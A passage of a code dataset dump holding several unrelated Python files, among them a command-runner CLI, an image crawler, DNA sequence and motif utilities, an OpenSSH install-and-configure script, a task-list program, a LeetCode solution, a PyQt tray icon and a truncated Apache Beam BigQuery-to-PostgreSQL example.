os\nimport sys\nfrom subprocess import PIPE, Popen\n\n\ndef expand_path(path):\n \"\"\"Expand variables in and provide absolute version of the given 'path'\"\"\"\n\n return os.path.abspath(os.path.expanduser(os.path.expandvars(path)))\n\n\ndef update_file(fpath, content):\n \"\"\"Writes 'content' to 'fpath'\"\"\"\n\n with open(fpath, \"w+\") as output:\n output.write(content)\n\n\ndef cmd_run(cmd, args):\n \"\"\"Execute the given command and return stdout, stderr, and returncode\"\"\"\n\n with Popen(\n cmd, shell=True, stdout=PIPE, stderr=PIPE, executable=args.shell\n ) as process:\n out, err = process.communicate()\n\n return out, err, process.returncode\n\n\ndef cmd_from_file(fpath):\n \"\"\"Produces a 'cmd' as a list of strings from the given 'fpath'\"\"\"\n\n # Grab commands\n with open(fpath) as cmdfd:\n cmds = [line.strip() for line in cmdfd.readlines()]\n\n # Merge those line-continuations\n cmds = \"\\n\".join(cmds).replace(\"\\\\\\n\", \"\").splitlines()\n\n if not cmds:\n fname = os.path.basename(fpath)\n cmds = [fname.replace(\".uone\", \"\").replace(\".cmd\", \"\")]\n\n return cmds\n\n\ndef produce_cmd_output(args):\n \"\"\"Do the actual work\"\"\"\n\n for root, _, fnames in os.walk(args.path):\n if args.recursive and root != args.path:\n continue\n\n for fname in sorted(fname for fname in fnames if fname.endswith(\".cmd\")):\n if args.exclude and args.exclude in fname:\n continue\n\n cmd_fpath = os.sep.join([root, fname])\n\n out_fpath = cmd_fpath.replace(\".cmd\", \".out\")\n err_fpath = cmd_fpath.replace(\".cmd\", \".err\")\n uone = cmd_fpath.endswith(\".uone.cmd\")\n output = []\n errored = False\n\n for cmd in cmd_from_file(cmd_fpath):\n stdout, stderr, rcode = cmd_run(cmd, args)\n\n output.append(stdout)\n output.append(stderr)\n\n err = bool(rcode) and not uone\n errored |= err\n\n yield out_fpath, cmd_fpath, cmd, rcode, uone, err\n\n if errored:\n update_file(err_fpath, \"\\n\".join([o.decode(\"utf-8\") for o in output]))\n\n if not errored or uone:\n update_file(out_fpath, \"\\n\".join([o.decode(\"utf-8\") for o in output]))\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=\"Run commands from .cmd files, storing output in .out files\"\n )\n parser.add_argument(\"path\", type=str, help=\"Path to DIR containing .cmd files\")\n parser.add_argument(\"-r\", \"--recursive\", action=\"store_true\", help=\"go deepah!\")\n parser.add_argument(\"-s\", \"--shell\", help=\"Absolute path to the Shell to use\")\n parser.add_argument(\"-x\", \"--exclude\", help=\"Exclude command-files matching this\")\n\n args = parser.parse_args()\n args.path = expand_path(args.path)\n\n return args\n\n\ndef main():\n \"\"\"Entry point\"\"\"\n\n args = parse_args()\n\n nerrs = 0\n\n try:\n print(\"args:\")\n print(\" path: %r\" % args.path)\n print(\" recursive: %r\" % args.recursive)\n print(\"results:\")\n for out_fp, cmd_fp, cmd, rcode, uone, err in produce_cmd_output(args):\n nerrs += int(err)\n\n print(\"- out_fp: %r\" % out_fp)\n print(\" cmd_fp: %r\" % cmd_fp)\n print(\" cmd: %r\" % cmd)\n print(\" rcode: %r\" % rcode)\n print(\" uone: %r\" % uone)\n print(\" err: %r\" % err)\n\n except OSError as exc:\n print(\"# err(%s)\" % exc)\n return 1\n\n print(\"nerrs: %r\" % nerrs)\n\n return nerrs\n","sub_path":"src/kmdo/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"207691526","text":"import re\nimport requests\nfrom urllib import error\nfrom bs4 import BeautifulSoup\nimport os\n\ndownload_pic_index = 0\n\nIMG_EXTENSIONS = [\n '.jpg', '.JPG', '.jpeg', '.JPEG',\n '.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',\n]\n\n\ndef Find(url, max_page=39):\n List = []\n print('正在检测图片总数,请稍等.....')\n t = 2\n s = 0\n while t < max_page:\n Url = url + str(t)\n try:\n Result = requests.get(Url, timeout=7)\n except BaseException:\n t = t + 1\n continue\n else:\n result = Result.text\n html_urls = re.findall('\"_blank\" href=\"(.*?)\"', result, re.S)\n\n for html_url in html_urls:\n if \"login\" not in html_url:\n try:\n Result = requests.get(Url, timeout=7)\n result = Result.text\n pic_urls = re.findall('src=\"(.*?)\"', result, re.S)\n\n s += len(pic_urls)\n if len(pic_urls) == 0:\n break\n else:\n List.append(pic_urls)\n\n except BaseException:\n continue\n t = t + 1\n\n\n\n\n\n return List, s\n\n\ndef dowmloadPicture(url_list, savepath, limit):\n global download_pic_index\n\n if not os.path.exists(savepath):\n os.mkdir(savepath)\n\n for eachhtml in url_list:\n for picurl in eachhtml:\n if \"900.png\" not in picurl:\n continue\n print('正在下载第' + str(download_pic_index + 1) + '张图片,图片地址:' + str(picurl))\n try:\n if picurl is not None:\n pic = requests.get(picurl, timeout=7)\n else:\n continue\n except BaseException:\n print('错误,当前图片无法下载')\n continue\n else:\n filetail = \".\" + picurl.split(\".\")[-1]\n\n if any(filetail == extension for extension in IMG_EXTENSIONS):\n download_file_path = 'pic_' + str(download_pic_index) + filetail\n else:\n download_file_path = 'pic_' + str(download_pic_index) + '.' + \"jpg\"\n\n download_file_path = os.path.join(savepath, download_file_path)\n fp = open(download_file_path, 'wb')\n fp.write(pic.content)\n fp.close()\n download_pic_index += 1\n if download_pic_index >= limit:\n return\n\n\ndef goToFind(savepath, limit):\n #11690 39,933 17,6570 19,414 , 88\n label = [\"11690\", \"933\", \"6570\", \"414\"]\n max_page = [39, 17, 19, 88]\n for index in range(3):\n\n url = 'https://ku.pzhan.com/'+label[index]+'/p'\n savepath = savepath + label[index]\n url_list, pic_count = Find(url, max_page[index])\n\n if not os.path.exists(savepath):\n os.mkdir(savepath)\n dowmloadPicture(url_list, os.path.join(savepath), limit)\n\n\n\nif __name__ == '__main__': # 主函数入口\n # https://safebooru.donmai.us/posts?page=2\n # 文件保存位置\n savepath = \"/media/letmesleep/LENOVO/datasets/cartoon_dataset/\"\n\n #下载最多不超过多少张图片\n limit = 30000\n\n goToFind(savepath, limit)\n\n print(\"total \" + str(download_pic_index) + \" pictures\")\n\n","sub_path":"datasets/data_utils/Crawlers/Pzhan.py","file_name":"Pzhan.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"508389305","text":"import sys\nimport numpy as np\nfrom itertools import zip_longest, product, chain, repeat\nimport viz_sequence\nimport train_TFmodel\nimport helper\nfrom scipy.signal import correlate2d\nfrom colour import Color\nimport matplotlib.pyplot as plt\n\none_hot_encoder = np.fromstring('acgt', np.uint8)\n\n# some sequence encoding methods\ndef encode_to_string(seq):\n \"return a string from string, uint8, or onehot\"\n if isinstance(seq, str):\n return seq\n elif isinstance(seq, np.ndarray):\n if seq.dtype == np.uint8:\n #uint8 array\n return seq.tostring().decode('UTF-8')\n else:\n #onehot array\n indicies = np.argmax(seq, axis=1)\n return np.asarray([one_hot_encoder[i] for i in indicies]).tostring().decode('UTF-8')\n else:\n raise TypeError('Sequence is not an accepted type')\n\ndef encode_to_uint8(seq):\n \"return a uint8 from string, uint8, or onehot\"\n if isinstance(seq, str):\n return np.fromstring(seq.lower(), dtype=np.uint8)\n elif isinstance(seq, np.ndarray):\n if seq.dtype == np.uint8:\n #uint8 array\n return seq\n else:\n #onehot array\n indicies = np.argmax(seq, axis=1)\n return np.asarray([one_hot_encoder[i] for i in indicies])\n else:\n raise TypeError('Sequence is not an accepted type')\n\ndef encode_to_onehot(seq):\n \"return a onehot from string, uint8, or onehot\"\n if isinstance(seq, str):\n return np.asarray([np.equal(char, one_hot_encoder) for char in np.fromstring(seq.lower(), dtype=np.uint8)])\n elif isinstance(seq, np.ndarray):\n if seq.dtype == np.uint8:\n #uint8 array\n return np.asarray([np.equal(char, one_hot_encoder) for char in seq])\n else:\n #onehot array\n return seq\n else:\n raise TypeError('Sequence is not an accepted type')\n\ndef rc(seq):\n \"\"\"Takes a seq to its reverse complement of same type.\"\"\"\n onehot = encode_to_onehot(seq)\n rc = onehot[:, ::-1, ::-1]\n if isinstance(seq, str):\n return encode_to_string(rc)\n elif isinstance(seq, np.ndarray):\n if seq.dtype == np.uint8:\n #uint8 array\n return encode_to_uint8(rc)\n else:\n #onehot array\n return rc\n else:\n raise TypeError('Sequence is not an accepted type')\n\nclass Sequence(object):\n \"\"\" Encoding and variations on a sequence.\n\n Attributes:\n seq -- onehot encoding of the sequence.\n \"\"\"\n \n def __init__(self, nucleotides):\n \"\"\" Create a sequence object.\n \n Arguments:\n nucleotides -- Sequence in string, np.uint8, or one-hot form.\n \"\"\"\n self.seq= encode_to_onehot(nucleotides) \n\n def __string__(self):\n \"\"\"ACTG representation of the sequence.\"\"\"\n return encode_to_string(self.seq)\n\n def __repr__(self):\n \"\"\"Information about the sequence.\"\"\"\n return 'Sequence() length ' + str(self.seq.shape[0])\n \n def logo(self, start=None, end=None):\n \"\"\"Plot a sequence logo from start to end.\"\"\"\n viz_sequence.plot_weights(self.seq[start:end])\n\n def model_input(self):\n return self.seq\n\n def sequential_mutant_gen(self):\n \"\"\"Generate sequences with a blank mutation.\"\"\"\n for idx in range(self.seq.shape[0]):\n new_seq = np.copy(self.seq)\n new_seq[idx] = np.fromstring('x', np.uint8)\n yield new_seq\n\n def ngram_mutant_gen(self, n=1, padding='valid'):\n \"\"\" Generate ngram mutants trying every possible amino acid combination of a length n in a sequence.\n\n Keywords:\n n -- width of the motif to mutate.\n padding -- valid or same, similar to keras funcitonality.\n \"\"\"\n done = False\n if padding != 'valid':\n print('Alternative padding not yet supported')\n while not done:\n for idx in range(len(self.seq)):\n if n//2 <= idx <= len(self.seq) - n//2 - 1:\n first = idx-n//2\n last = idx+(n+1)//2 \n #standard case\n ngrams = product(one_hot_encoder, repeat=n)\n for gram in ngrams:\n new_seq = np.copy(self.seq)\n new_seq[first:last] = encode_to_onehot(np.asarray(gram))\n yield new_seq\n done = True\n\n def double_mutant_gen(self, n=1):\n \"\"\"Generate every possible double mutant.\"\"\"\n for mut1_seq in self.ngram_mutant_gen(n=n):\n for mut2_seq in Sequence(mut1_seq).ngram_mutant_gen(n=n):\n yield mut2_seq\n\n def insertion_mutant_gen(self, n=1):\n \"\"\"Generate every n length insertion.\"\"\"\n done = False\n while not done:\n for idx in range(len(self.seq)):\n ngrams = product(one_hot_encoder, repeat=n)\n for gram in ngrams:\n new_seq = np.insert(self.seq, idx, encode_to_onehot(np.asarray(gram)), axis=0)\n yield new_seq[:256]\n done = True\n\n def deletion_mutant_gen(self, n=1):\n \"\"\"Generate every deletion mutant.\"\"\"\n done = False\n while not done:\n ngrams = product(one_hot_encoder, repeat=n)\n gram = next(ngrams)\n for start_idx in range(len(self.seq)-n):\n del_idx = range(start_idx, start_idx+n)\n new_seq = np.delete(self.seq, del_idx, axis=0)\n new_seq = np.append(new_seq, encode_to_onehot(np.asarray(gram)), axis=0)\n yield new_seq\n done = True\n\n def motif_insert_gen(self, motif, mode='same'):\n \"\"\"Insert a given motif at every position.\"\"\"\n #have i track the middle of the insertion\n for i in range(self.seq.shape[0]):\n new_seq = self.seq.copy()\n if i-motif.shape[0]//2 < 0: # too early\n if mode == 'same':\n new_seq[0:i-motif.shape[0]//2 + motif.shape[0]] = motif[motif.shape[0]//2 - i:]\n yield new_seq\n elif i-motif.shape[0]//2 + motif.shape[0] > new_seq.shape[0]: # too late\n if mode == 'same':\n new_seq[i-motif.shape[0]//2:new_seq.shape[0]] = motif[:new_seq.shape[0]-i+motif.shape[0]//2]\n yield new_seq\n else: # just right\n new_seq[i-motif.shape[0]//2:i-motif.shape[0]//2 + motif.shape[0]] = motif\n yield new_seq\n\n def find_pwm(self, meme_library=None, viz=False):\n \"\"\" Convolute a meme with the sequence.\n \n Keywords:\n meme_library -- list of memes to use.\n viz -- sequence logo of importance?\n Output:\n meme -- SeqDist() of the best matching meme.\n position -- start position of the hit.\n score -- correlation score.\n \"\"\"\n if meme_library==None:\n meme_library = CTCF_memes\n # find the meme and location of the best match.\n score = -np.inf\n position = 0\n meme = meme_library[0]\n for test_meme in meme_library:\n corr = correlate2d(self.seq, test_meme.pwm, mode='valid')\n if np.nanmax(corr) > score:\n score = np.nanmax(corr)\n position = np.nanargmax(corr)\n meme = test_meme\n if viz:\n print('Weighted log-odds of the Sequence Distribution')\n insert = np.zeros(self.seq.shape)\n insert[position:position+meme.pwm.shape[0]] = meme.pwm\n overlap = insert * self.seq\n viz_sequence.plot_weights(overlap)\n return meme, position, score\n \n def run_pwm(self, meme=None, position=None, viz=False):\n \"\"\"Get the pwm correlation score with a sequence.\n\n Keywords:\n meme -- SeqDist() of the best matching meme, or library of memes to test.\n position -- start position of the hit.\n viz -- sequence logo of importance?\n Outputs:\n overlap -- overlap which can be summed for the score.\n \"\"\"\n if meme==None:\n # we need to find everything\n meme, position, score = self.find_pwm()\n elif position==None or isinstance(meme, list):\n # we have the meme/memelist\n meme, position, score = self.find_pwm(meme_library=meme)\n # just get the score\n insert = np.zeros(self.seq.shape)\n insert[position:position+meme.pwm.shape[0]] = meme.pwm\n overlap = insert * self.seq\n if viz:\n print('Weighted log-odds of the Sequence Distribution')\n viz_sequence.plot_weights(overlap)\n return overlap\n\nclass SeqDist(Sequence):\n \"\"\"A sequence, but as a probability distribution.\n\n Attributes:\n seq -- probability distribution of bases. \n \"\"\"\n\n def __init__(self, distribution):\n \"\"\"Create a new sequence distribution object.\"\"\"\n if isinstance(distribution, np.ndarray) and not (distribution.dtype == np.uint8):\n # right type!\n self.seq = helper.softmax(np.log(distribution)) \n else:\n raise TypeError('Sequence is not an accepted type')\n \n def __repr__(self):\n \"\"\"Information about the sequence.\"\"\"\n return 'SeqDist() length ' + str(self.seq.shape[0])\n\n def logo(self, start=None, end=None):\n \"\"\"Plot a sequence logo from start to end.\"\"\"\n viz_sequence.plot_icweights(self.seq[start:end])\n\n def discrete_gen(self):\n \"\"\"Create a generator of discrete sequences.\"\"\"\n while True: \n yield self.discrete_seq()\n\n def discrete_seq(self):\n \"\"\"Return a discrete sequence samples from the continuous distribuiton.\"\"\"\n discrete = [np.random.choice(one_hot_encoder, p=base) for base in self.seq]\n return encode_to_onehot(np.asarray(discrete))\n\nclass Meme(SeqDist):\n \"\"\"A position weight matrix.\n \n Attirbutes:\n seq -- frequency representation of the seqeunce.\n pwm -- log-odds representaiton of the motif. \n \"\"\"\n\n def __init__(self, dist, pwm):\n \"\"\"Create a new Meme object.\"\"\"\n self.seq = helper.softmax(np.log(dist))\n self.pwm = pwm\n\n def __repr__(self):\n \"\"\"Information about the sequence.\"\"\"\n return 'Meme() length ' + str(self.seq.shape[0])\n\nclass ATACSeq(Sequence):\n \"\"\" A Sequence and matching atac counts.\"\"\"\n\n def __init__(self, nucs, atac_counts=None):\n if atac_counts == None:\n super().__init__(nucs[:, 1:])\n self.atac_counts = nucs[:, 0]\n else:\n super().__init__(nucs)\n self.atac_counts = atac_counts\n\n def model_input(self):\n return np.insert(self.seq.astype(np.float32), 0, self.atac_counts, axis=1)\n\n def sequential_mutant_gen(self):\n s = super().sequential_mutant_gen\n for nucs in s:\n yield np.insert(nucs.astype(np.float32), 0, self.atac_counts, axis=1)\n\n def ngram_mutant_gen(self, n=1, padding='valid'):\n n = super().ngram_mutant_gen(n=n, padding=padding)\n for nucs in n:\n yield np.insert(nucs.astype(np.float32), 0, self.atac_counts, axis=1) \n \n def double_mutant_gen(self, n=1):\n s = super().double_mutant_gen(n)\n for nucs in s:\n yield np.insert(nucs.astype(np.float32), 0, self.atac_counts, axis=1)\n\n def logo(self, top=None, bottom=None):\n colors = list(Color(\"blue\").range_to(Color(\"white\"), 50))\n [colors.append(c) for c in (Color(\"white\").range_to(Color(\"red\"), 51))]\n if top == None:\n top = np.amax(self.atac_counts)\n if bottom == None:\n bottom = np.amin(self.atac_counts)\n \n #get hightlights!\n color_weights = [int((x-bottom)/(top-bottom)*100) for x in self.atac_counts]\n highlight=dict()\n for i in range(len(self.atac_counts)):\n w = color_weights[i]\n highlight[(colors[w].rgb[0],colors[w].rgb[1], colors[w].rgb[2], .3)] = [(i, i+1)]\n #plot things out\n viz_sequence.plot_weights(self.seq, highlight=highlight)\n\n def graph(self):\n plt.figure(figsize=(20, 2))\n plt.title('ATAC counts per base')\n plt.plot(self.atac_counts)\n plt.show()\n\n\n\nclass ATACDist(SeqDist):\n \"\"\" A sequence distribution and matching atac counts.\"\"\"\n\n def __init__(self, nucs, atac_counts=None):\n if atac_counts == None:\n super().__init__(nucs[:, 1:])\n self.atac_counts = nucs[:, 0]\n else:\n super().__init__(nucs)\n self.atac_counts = atac_counts\n\n def discrete_seq(self):\n return np.insert(super().discrete_seq().astype(np.float32), 0, self.atac_counts, axis=1)\n\n \ndef process_meme(meme_path, transform=False, verb=False):\n \"\"\"Extract a meme distribution and process.\n \n Arguments:\n meme_path -- file path to a .meme file.\n Keywords:\n transform -- apply normalization and a log transform or use the pre-generated log-odds matrix.\n Outputs:\n meme_list -- List of SeqDist() meme and reverse complements.\n \"\"\"\n with open(meme_path, 'r') as infile:\n meme_length = -1\n meme_dists = list()\n meme_lods = list()\n # read for the frequencies\n for line in infile.readlines():\n if 'letter-probability matrix' in line:\n meme_length = int(line.split()[5])\n if verb:\n print('found meme')\n this_meme_lines = list()\n elif meme_length > 0:\n this_meme_lines.append([float(item.strip()) for item in line.split()])\n meme_length = meme_length - 1\n elif meme_length == 0:\n this_meme = np.asarray(this_meme_lines)\n meme_dists.append(this_meme)\n meme_length = -1\n if meme_length == 0:\n this_meme = np.asarray(this_meme_lines)\n meme_dists.append(this_meme)\n meme_length = -1\n # add rcs of memes\n rcs = list()\n for meme in meme_dists:\n rcs.append(meme[::-1, ::-1])\n meme_dists = meme_dists + rcs\n with open(meme_path, 'r') as infile:\n # read for the pwms\n for line in infile.readlines():\n if 'log-odds matrix' in line:\n meme_length = int(line.split()[5])\n this_meme_lines = list()\n elif meme_length > 0:\n this_meme_lines.append([float(item.strip()) for item in line.split()])\n meme_length = meme_length - 1\n elif meme_length == 0:\n this_meme = np.asarray(this_meme_lines)\n meme_lods.append(this_meme)\n meme_length = -1\n if meme_length == 0:\n this_meme = np.asarray(this_meme_lines)\n meme_lods.append(this_meme)\n meme_length = -1\n # add rcs of memes\n rcs = list()\n for meme in meme_lods:\n rcs.append(meme[::-1, ::-1])\n meme_lods = meme_lods + rcs\n if len(meme_lods) == 0:\n #transofrm the memes\n if verb:\n print('using manual log-odds calculation')\n psuedocount=0.005\n for meme in meme_dists:\n # add the pseudocount so probabilities don't zero out\n meme = meme*(.98) + psuedocount\n #norms = np.repeat(np.linalg.norm(meme, axis=1), 4).reshape((-1, 4))\n meme = np.log(meme) - np.log(.25)\n meme_lods.append(meme)\n #make distribution objects\n meme_list = [Meme(distribution, log_odds) for distribution, log_odds in zip(meme_dists, meme_lods)]\n return meme_list\n\nCTCF_memes = process_meme('/home/kal/TF_models/data/memes/CTCF.meme')\nmystery_memes = process_meme('/home/kal/TF_models/data/memes/mystery_motif.meme') \n","sub_path":"bin/atacseq.py","file_name":"atacseq.py","file_ext":"py","file_size_in_byte":15928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"278945719","text":"#!/usr/bin/python3\n\nfrom subprocess import PIPE, call, Popen\nimport os, sys\nfrom time import sleep\nimport re\nimport fileinput\n\nDN = open(os.devnull, 'w')\n\nopenssh = b'^openssh-server'\n\ndef search(pkg):\n\tproc = Popen(['apt-cache', 'search', pkg],stdout=PIPE, stderr=DN)\n\n\tlistPkg = proc.communicate()[0].split(b'\\n')\n\n\tfor package in listPkg:\n\t\tif len(package) == 0:\n\t\t\tcontinue\n\t\tif (package[0]) != b' '[0]:\n\t\t\tglobal getPackage\n\t\t\tgetPackage = package[:package.find(b' ')]\n\t\t\tif re.match(pkg, getPackage, re.IGNORECASE):\n\t\t\t\tprint('Package %s available to install...' % (getPackage.decode(\"utf-8\")))\n\t\t\telse:\n\t\t\t\tprint('Package %s not available, please add another repository package...' % (getPackage))\n\n\treturn getPackage\n\ndef configSSH():\n\t'''\n\t\tFunction of configuration OpenSSH-Server\n\t'''\n\n\tos.system('clear')\n\tprint('Installation Process Done...')\n\tprint('Configuration OpenSSH-Server\\n')\n\tconfigFile = '/etc/ssh/sshd_config'\n\tif os.path.isfile(configFile) and os.access(configFile, os.R_OK):\n\t\t# code here\n\t\ttry:\n\t # config = open(configFile, 'r')\n\t\t\twith open(configFile, 'r') as searchconfig:\n\t\t\t\tfor port in searchconfig:\n\t\t\t\t\tif 'Port' in port:\n\t\t\t\t\t\told_port = port\n\t\t\t\t# for rootlogin in searchconfig:\n\t\t\t\t# \tif 'PermitRootLogin' in root_login:\n\t\t\t\t# \t\troot_access = root_login\n\n\t # print(root_access)\n\n\t\t\twith fileinput.FileInput(configFile, inplace=True, backup='.bak') as conf:\n\t\t\t\tnew_port = input('Set Port SSH(default Port 22): ')\n\t\t\t\tdefault = '22'\n\n\t\t\t\tfor configPort in conf:\n\t\t\t\t\t\tif not new_port:\n\t\t\t\t\t\t\tprint(configPort.replace(old_port, ('Port %s\\n' % default)), end=\"\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint(configPort.replace(old_port, ('Port %s\\n' % new_port)), end=\"\")\n\t\t\tconf.close()\n\t\texcept IOError:\n\t\t\tprint('Something wrong')\n\t# else:\n\t# \treturn search(openssh)\n\nif __name__ == '__main__':\n\ttry:\n\t\tif not os.geteuid() == 0:\n\t\t\texit('Please run as r00t...\\n')\n\n\t\t# checkPkg(openssh)\n\n\t\tsearch(openssh)\n\n\t\tchar = re.sub(b'[\\^]', b'', openssh)\n\t\tif getPackage == char:\n\t\t\tdoInstall = call(['apt-get', 'install', getPackage], stderr=DN)\n\t\t\tconfigSSH()\n\t\t\tprint('Configuration Success...')\n\t\t\t# print(getPackage.decode(\"utf-8\"))\n\texcept SyntaxError as error:\n\t\tprint('Something wrong to execution')\n","sub_path":"openssh.py","file_name":"openssh.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"236914203","text":"def insere_atividade():\r\n n = input('insira o numero de atividades a serem cadastradas: ')\r\n\r\n # atividade = {'titulo': 't', 'materia': 'm', 'pontuação': 'p', 'data': 'd' }\r\n i = int(n)\r\n lista = list()\r\n while i > 0:\r\n lista.append({'título': input('Insira o título da atividade: '), 'materia': input('Insira a materia: '),\r\n 'pontuacao': int(input('Insira a pontuacao: ')), 'data': input('Insira a data de entrega: ')})\r\n i -= 1\r\n lista_ordenada = sorted(lista, key=lambda k: k['pontuacao'], reverse=True)\r\n with open('Lista_atividades', 'a+') as file:\r\n for n in range(len(lista_ordenada)):\r\n file.writelines(str(lista_ordenada[n]).split(sep=',{'))\r\n file.write('\\n')\r\n#file.writelines(str(lista_ordenada).split(sep=',{'))\r\n return lista_ordenada\r\n\r\n\r\ndef deleta_atividade(lista):\r\n n = input('Entre com a posição, entre espaços, das atividades a eliminar da lista: ')\r\n leng = n.split()\r\n t = len(leng)\r\n i = t\r\n while i > 0:\r\n i -= 1\r\n del (lista[int(leng[i])])\r\n\r\n with open('Lista_atividades', 'w+') as file:\r\n for n in range(len(lista)):\r\n if str(lista[n]) != '\\n':\r\n file.writelines(str(lista[n]).split(sep=',{'))\r\n# file.write('\\n')\r\n\r\n\r\ndef imprime_atividade():\r\n file = open('Lista_atividades')\r\n print(file.read())\r\n\r\n\r\n\r\np = True\r\nwhile p is True:\r\n arquivo = open('Lista_atividades')\r\n lista_univ = arquivo.readlines()\r\n c = input(\r\n 'Entre com uma opção de execução:\\n[1] - Inserir atividade\\n[2] - Deletar atividade\\n[3] - Imprimir lista de '\r\n 'tarefas\\n[4] - Sair\\n')\r\n if int(c) == 1:\r\n lista_univ = insere_atividade()\r\n if int(c) == 2:\r\n deleta_atividade(lista_univ)\r\n if int(c) == 3:\r\n imprime_atividade()\r\n if int(c) == 4:\r\n p = False\r\n","sub_path":"Lista_1_Q2.py","file_name":"Lista_1_Q2.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"494540368","text":"# 696. Count Binary Substrings\n# DescriptionHintsSubmissionsDiscussSolution\n# Give a string s, count the number of non-empty (contiguous) substrings that have the same number of 0's and 1's, and all the 0's and all the 1's in these substrings are grouped consecutively.\n# Substrings that occur multiple times are counted the number of times they occur.\n# Example 1:\n# Input: \"00110011\"\n# Output: 6\n# Explanation: There are 6 substrings that have equal number of consecutive 1's and 0's: \"0011\", \"01\", \"1100\", \"10\", \"0011\", and \"01\".\n# Notice that some of these substrings repeat and are counted the number of times they occur.\n# Also, \"00110011\" is not a valid substring because all the 0's (and 1's) are not grouped together.\n# Example 2:\n# Input: \"10101\"\n# Output: 4\n# Explanation: There are 4 substrings: \"10\", \"01\", \"10\", \"01\" that have equal number of consecutive 1's and 0's.\n# Note:\n# s.length will be between 1 and 50,000.\n# s will only consist of \"0\" or \"1\" characters.\n\n\nclass Solution:\n # 我想出来的方法一,首先将二进制字符串分割,把连续的0或者连续的1放在一起,并存储在一个list中(只需要存储串的长度)。\n # 遍历该list,在每一对相邻两个元素中,取其较小者,累加即可得到结果。\n # 该方法需要遍历两次(相当于)数组。可以改进\n def countBinarySubstrings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n i, l, count = 0, len(s), 0\n ls = []\n while i < l:\n j = i + 1\n # 其实不需要用‘0’来判断,后面只要判断s[j] == s[i]就行了\n if s[i] == '0':\n while j < l and s[j] == '0':\n j += 1\n else:\n while j < l and s[j] == '1':\n j += 1\n ls.append(j - i)\n i = j\n i = 1\n while i < len(ls):\n count += min(ls[i], ls[i - 1])\n i += 1\n return count\n\n # 尝试遍历一次字符串得到结果.\n def method2(self, s):\n i = count = 0\n l = len(s)\n a, b = -1, 0\n while i < l:\n j = i + 1\n while j < l and s[j] == s[i]:\n j += 1\n if a == -1:\n a = j - i\n else:\n b = j - i\n count += min(a, b)\n a = b\n i = j\n return count\n\n\nif __name__ == '__main__':\n s = Solution()\n s_ = '01010100011'\n print(s.countBinarySubstrings(s_))\n print(s.method2(s_))\n\n\nconsecutively.So","sub_path":"python/Leetcode/count_binary_string.py","file_name":"count_binary_string.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"49670243","text":"from PyQt5 import QtWidgets,QtGui,QtCore\nimport sys\nclass M_tray(QtWidgets.QSystemTrayIcon):\n def __init__(self,aa):\n super(M_tray, self).__init__(aa)\n self.setIcon(QtGui.QIcon(\"Res/Tray.ico\"))\n #托盘被点击icocliced\n self.activated.connect(self.icoclicked)\n self.icon = self.MessageIcon()\n self.showmenu()\n def showmenu(self):\n pw=self.parent()\n self.mainmenu=QtWidgets.QMenu()\n self.mainAction = QtWidgets.QAction(\"显示主界面\", self, triggered=pw.show)\n self.settinAction = QtWidgets.QAction(\"设置\", self, triggered=pw.aa.show)\n self.quitAction = QtWidgets.QAction(\"退出\", self, triggered=self.quit)\n self.mainmenu.addAction(self.mainAction)\n self.mainmenu.addAction(self.settinAction)\n self.mainmenu.addAction(self.quitAction)\n self.setContextMenu(self.mainmenu)\n def icoclicked(self,reason):\n pw=self.parent()\n if reason==2:\n if pw.isVisible():\n pw.hide()\n else:\n pw.show()\n def quit(self):\n self.setVisible(False)\n #注意close()、quit()、与exit()的区别\n self.parent().close()\n sys.exit()\n","sub_path":"Models/M_tray.py","file_name":"M_tray.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"306284843","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\"\"\"\n\nMade to run with directrunner and a local PostgreSQL database in docker.\n\nReads data from BQ, writes to two tables in PostgreSQL.\n\nexample based on https://github.com/apache/beam/blob/master/sdks/python/apache_beam/examples/cookbook/bigquery_tornadoes.py\n\npython bq-postgres.py --temp_location gs://PROJECT_ID-test --project PROJECT_ID\n\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom beam_nuggets.io import relational_db\nfrom sqlalchemy import Table, Integer, String, Column\n\nimport datetime;\n\nimport argparse\nimport logging\n\nimport apache_beam as beam\n\n\ndef count_categories(input_data):\n \"\"\"\n\n \"\"\"\n ts = datetime.datetime.now().strftime(\"%Y%m%d%-%H%M%S\")\n\n return (\n input_data\n | 'count ' >> beam.FlatMap(\n lambda row: [(int(row['category']),1)])\n | 'count inputs' >> beam.CombinePerKey(sum)\n | 'formatoutput' >>\n beam.Map(lambda k_v: {\n 'category_ts': str(k_v[0])+ts, 'count': k_v[1]\n }))\n\n\ndef run(argv=None):\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--input',\n default='PROJECT_ID:demos.small_teams',\n help=(\n 'Input BigQuery table to process specified as: '\n 'PROJECT:DATASET.TABLE or DATASET.TABLE.'))\n parser.add_argument(\n '--output',\n# required=True,\n required=False,\n help=(\n 'Output BigQuery table for results specified as: '\n 